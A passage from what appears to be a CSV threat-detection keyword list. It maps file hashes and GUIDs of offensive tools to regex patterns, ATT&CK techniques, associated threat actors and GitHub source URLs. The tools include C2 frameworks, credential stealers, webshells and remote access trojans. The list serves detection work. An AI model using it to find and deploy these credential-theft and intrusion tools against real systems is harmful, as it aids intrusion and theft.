Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","42327" "*e8467998e22a50d952a786c2ce337493cdd4d32a7e035a7af58bdc3c9b3f17ed*",".{0,1000}e8467998e22a50d952a786c2ce337493cdd4d32a7e035a7af58bdc3c9b3f17ed.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#filehash","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","42328" "*e848c25347ea3027e46eb9825cc47f3e8eaf44c5aead6691d6ea61c27cd4b136*",".{0,1000}e848c25347ea3027e46eb9825cc47f3e8eaf44c5aead6691d6ea61c27cd4b136.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42329" "*e8551730a864826e18b2283e7a5a24fababe9de86fa88974c4c5dafe314e079f*",".{0,1000}e8551730a864826e18b2283e7a5a24fababe9de86fa88974c4c5dafe314e079f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42333" "*e86f3bf9daab62a33014d63811a020cab6ebb0570a8cea4496b1ee586ad6c5bd*",".{0,1000}e86f3bf9daab62a33014d63811a020cab6ebb0570a8cea4496b1ee586ad6c5bd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42335" "*e87317b17ec11d9ccb88c88be71d293acf3ea497af1f5fca05a3292667962257*",".{0,1000}e87317b17ec11d9ccb88c88be71d293acf3ea497af1f5fca05a3292667962257.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42336" "*e8764235881acc005589fc1d0e0dce61af095f9d1d6f122bf75fd8b95f4bb368*",".{0,1000}e8764235881acc005589fc1d0e0dce61af095f9d1d6f122bf75fd8b95f4bb368.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim 
Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","42337" "*e88262454c26daae342bea04507e03b8b49599d5fd2d5ec81027e685333a4104*",".{0,1000}e88262454c26daae342bea04507e03b8b49599d5fd2d5ec81027e685333a4104.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42338" "*e8831136f2ddf051e2b1e127ff7ebec5351f9a5a33d80289343ddfee2fd1ff2e*",".{0,1000}e8831136f2ddf051e2b1e127ff7ebec5351f9a5a33d80289343ddfee2fd1ff2e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42339" "*e888bdb98dec5ad0f33feec1ce1563987ae364a7d27da8a1676d763d1d04fbef*",".{0,1000}e888bdb98dec5ad0f33feec1ce1563987ae364a7d27da8a1676d763d1d04fbef.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42340" "*e8923c77fca2d26eed8cef702814542d9afaebe79797517b7a24b42effc7433a*",".{0,1000}e8923c77fca2d26eed8cef702814542d9afaebe79797517b7a24b42effc7433a.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","42341" "*e8930c16d171577f55aa0cbdd8fe5fe656bba46751cd44e2e2fda325b6f6e9b9*",".{0,1000}e8930c16d171577f55aa0cbdd8fe5fe656bba46751cd44e2e2fda325b6f6e9b9.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","42342" 
"*e8950dfc957d2323f55944075134ff945bb8c467e48c1b4b7c86725b09460da2*",".{0,1000}e8950dfc957d2323f55944075134ff945bb8c467e48c1b4b7c86725b09460da2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42343" "*e897d08460dbb646108b17a32455d9be51487bee26b48dfef992b7f246d54f1d*",".{0,1000}e897d08460dbb646108b17a32455d9be51487bee26b48dfef992b7f246d54f1d.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42345" "*e8a017f717909f20e325d901af37d25b1e19e363923dfe61dfecae77d7d979ef*",".{0,1000}e8a017f717909f20e325d901af37d25b1e19e363923dfe61dfecae77d7d979ef.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","42347" "*e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173*",".{0,1000}e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","42349" "*e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173*",".{0,1000}e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","42350" "*e8a6280ea27ebc3633c9976efa12a8b00b995e6234d03bbfd802fe118c713d1a*",".{0,1000}e8a6280ea27ebc3633c9976efa12a8b00b995e6234d03bbfd802fe118c713d1a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts 
suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42351" "*e8b23510668248699f0891fc9eafd8fb65e6dc77a21153731a492a74906ad3fc*",".{0,1000}e8b23510668248699f0891fc9eafd8fb65e6dc77a21153731a492a74906ad3fc.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","42352" "*e8b691790bf24db24c00083a78e42fa9bb87fbb7abd763ee5e415ad3f8e1979c*",".{0,1000}e8b691790bf24db24c00083a78e42fa9bb87fbb7abd763ee5e415ad3f8e1979c.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","42354" "*e8bba4503b2e26b62002980969dc7a3d1dbe1699c4ce054929692704600b33ba*",".{0,1000}e8bba4503b2e26b62002980969dc7a3d1dbe1699c4ce054929692704600b33ba.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","42355" 
"*e8bcea5769f7121a256a8d690d1eeae2a6040af90d7d97fccfc0379c241df060*",".{0,1000}e8bcea5769f7121a256a8d690d1eeae2a6040af90d7d97fccfc0379c241df060.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42356" "*e8be0cc95ad642e83a961dc485a62aa6938b5974bbb205d1fdaec72fef860e58*",".{0,1000}e8be0cc95ad642e83a961dc485a62aa6938b5974bbb205d1fdaec72fef860e58.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42357" "*e8c419d7176ad443676893924e1a1c0871bda59e512297b9b5846bebe9568b56*",".{0,1000}e8c419d7176ad443676893924e1a1c0871bda59e512297b9b5846bebe9568b56.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42358" "*e8c42b6656710ed22955acf7a112ba19b6f4ccd8c6fd195f9133539eeb1aa692*",".{0,1000}e8c42b6656710ed22955acf7a112ba19b6f4ccd8c6fd195f9133539eeb1aa692.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42359" "*e8c954604c706d3a252049c1e639abf09fb55b90f97b1957895063b6fb8309d3*",".{0,1000}e8c954604c706d3a252049c1e639abf09fb55b90f97b1957895063b6fb8309d3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42361" "*E8CA6917-CB06-4128-96CD-59676731B24A*",".{0,1000}E8CA6917\-CB06\-4128\-96CD\-59676731B24A.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","42362" "*e8cba96e827c21f74919a949d5e149849b05de37a9892b61a31019f540eb24a4*",".{0,1000}e8cba96e827c21f74919a949d5e149849b05de37a9892b61a31019f540eb24a4.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42363" "*e8d08184a9c9b9f5b4263107fa19cfad2735f161dd2b16670ee8f68943fda2cf*",".{0,1000}e8d08184a9c9b9f5b4263107fa19cfad2735f161dd2b16670ee8f68943fda2cf.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","42364" "*e8d4f270bb109e0a3930dc3bf3413d8d071d283c19054809057fb9560f4daa44*",".{0,1000}e8d4f270bb109e0a3930dc3bf3413d8d071d283c19054809057fb9560f4daa44.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","0","#filehash","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","42365" 
"*e8dc7a34e869e6e7858a02be0ca8f799a4c5c411e4297c6df0687157bd3093fc*",".{0,1000}e8dc7a34e869e6e7858a02be0ca8f799a4c5c411e4297c6df0687157bd3093fc.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","42366" "*e8ddad70f68375dbf38d0e8550acf1e53f5382e0bf9a0ee8f02f8b1c6222db81*",".{0,1000}e8ddad70f68375dbf38d0e8550acf1e53f5382e0bf9a0ee8f02f8b1c6222db81.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","#filehash","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","42367" "*e8de489a84256609ac4e2b5236737d953af63fed9601d3f69253a5f199d901fc*",".{0,1000}e8de489a84256609ac4e2b5236737d953af63fed9601d3f69253a5f199d901fc.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42368" "*e8e43ef253fac38fa05323b327609c182bb1b5342d340301424deeaf1bd26673*",".{0,1000}e8e43ef253fac38fa05323b327609c182bb1b5342d340301424deeaf1bd26673.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42370" "*e8e5705168a9c66d1a4cf17d3ef2928b9141bffa3ca28a0482536e7900975a87*",".{0,1000}e8e5705168a9c66d1a4cf17d3ef2928b9141bffa3ca28a0482536e7900975a87.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - 
T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","42371" "*e8eb686267d1017f0c044f8725a91d2a3b0111156975f4918c9b3839b571483f*",".{0,1000}e8eb686267d1017f0c044f8725a91d2a3b0111156975f4918c9b3839b571483f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42374" "*e8f8b9e708015321f0a7be88076f0e92c7215d2d93765349c34cfe599d135b6c*",".{0,1000}e8f8b9e708015321f0a7be88076f0e92c7215d2d93765349c34cfe599d135b6c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42376" "*e8fa4ebebd818555956378e99e7cf03fe694f105e45c4531824166d7689997f4*",".{0,1000}e8fa4ebebd818555956378e99e7cf03fe694f105e45c4531824166d7689997f4.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in 
rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","#filehash","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","42377" "*e8fbec25db4f9d95b5e8f41cca51a4b32be8674a4dea7a45b6f7aeb22dbc38db*",".{0,1000}e8fbec25db4f9d95b5e8f41cca51a4b32be8674a4dea7a45b6f7aeb22dbc38db.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","42378" "*e8fbec25db4f9d95b5e8f41cca51a4b32be8674a4dea7a45b6f7aeb22dbc38db*",".{0,1000}e8fbec25db4f9d95b5e8f41cca51a4b32be8674a4dea7a45b6f7aeb22dbc38db.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - 
TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","42379" "*e8fbec25db4f9d95b5e8f41cca51a4b32be8674a4dea7a45b6f7aeb22dbc38db*",".{0,1000}e8fbec25db4f9d95b5e8f41cca51a4b32be8674a4dea7a45b6f7aeb22dbc38db.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","0","#filehash","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","42380" "*e9073493a75df11850c5f3e6738b108c831ed0346bd6b9c5e5cd18e4bd4d645e*",".{0,1000}e9073493a75df11850c5f3e6738b108c831ed0346bd6b9c5e5cd18e4bd4d645e.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","42382" "*E9172085-1595-4E98-ABF8-E890D2489BB5*",".{0,1000}E9172085\-1595\-4E98\-ABF8\-E890D2489BB5.{0,1000}","offensive_tool_keyword","GlobalUnProtect","Decrypt GlobalProtect configuration and cookie files.","T1552 - T1003 - T1555","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rotarydrone/GlobalUnProtect","1","0","#GUIDproject","N/A","9","2","147","19","2024-09-10T20:19:24Z","2024-09-04T15:31:52Z","42384" "*e91d6dca160c284f21b663cac5aae2f4afd9ce45e8abacb517fa34fc42e754a1*",".{0,1000}e91d6dca160c284f21b663cac5aae2f4afd9ce45e8abacb517fa34fc42e754a1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
